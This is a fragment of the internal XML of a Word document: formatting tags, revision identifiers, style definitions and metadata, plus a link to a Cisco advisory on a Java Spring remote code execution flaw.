        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1EDE5368" wp14:editId="52328B75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9264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969B9"/>
    <w:rsid w:val="00080B01"/>
    <w:rsid w:val="000A16EA"/>
    <w:rsid w:val="000C5AA3"/>
    <w:rsid w:val="000E35E9"/>
    <w:rsid w:val="00122AC6"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="001B2A28"/>
    <w:rsid w:val="001C0303"/>
    <w:rsid w:val="001D738C"/>
    <w:rsid w:val="00204D15"/>
    <w:rsid w:val="00257C66"/>
    <w:rsid w:val="002E0079"/>
    <w:rsid w:val="00382B24"/>
    <w:rsid w:val="003A4E36"/>
    <w:rsid w:val="003B17B0"/>
    <w:rsid w:val="003D1839"/>
    <w:rsid w:val="003F7471"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="00523697"/>
    <w:rsid w:val="00535F24"/>
    <w:rsid w:val="005E7177"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00602634"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00641511"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="00733DD9"/>
    <w:rsid w:val="007B2A88"/>
    <w:rsid w:val="007C0B17"/>
    <w:rsid w:val="007C4A32"/>
    <w:rsid w:val="007D4FC3"/>
    <w:rsid w:val="00823670"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00853D68"/>
    <w:rsid w:val="008600DC"/>
    <w:rsid w:val="00864686"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="00890CB4"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="008F6264"/>
    <w:rsid w:val="00932005"/>
    <w:rsid w:val="0093358E"/>
    <w:rsid w:val="00A2399C"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00AA5F05"/>
    <w:rsid w:val="00AA63A7"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B33E40"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B509F7"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00B715C4"/>
    <w:rsid w:val="00B77CF5"/>
    <w:rsid w:val="00BC2024"/>
    <w:rsid w:val="00C2299C"/>
    <w:rsid w:val="00C714A1"/>
    <w:rsid w:val="00CF0798"/>
    <w:rsid w:val="00D90C5E"/>
    <w:rsid w:val="00D957BF"/>
    <w:rsid w:val="00E00978"/>
    <w:rsid w:val="00E307CA"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E40801"/>
    <w:rsid w:val="00E66185"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00EB7E83"/>
    <w:rsid w:val="00EE03FC"/>
    <w:rsid w:val="00F06F13"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00F5126E"/>
    <w:rsid w:val="00F649B5"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="00FD51F7"/>
    <w:rsid w:val="00FD6855"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628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F1F3E8"/>
  <w15:docId w15:val="{A499769B-8B54-4FF5-BB29-2979B05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20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b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A7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styleId="a8">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E717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C0B1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c.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc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forever lazy</cp:lastModifiedBy>
  <cp:revision>67</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-06T05:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-27T19:50:00Z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F961DC4C1D9B460CAB021EA163E041CB</vt:lpwstr>
  </property>
</Properties>
</file>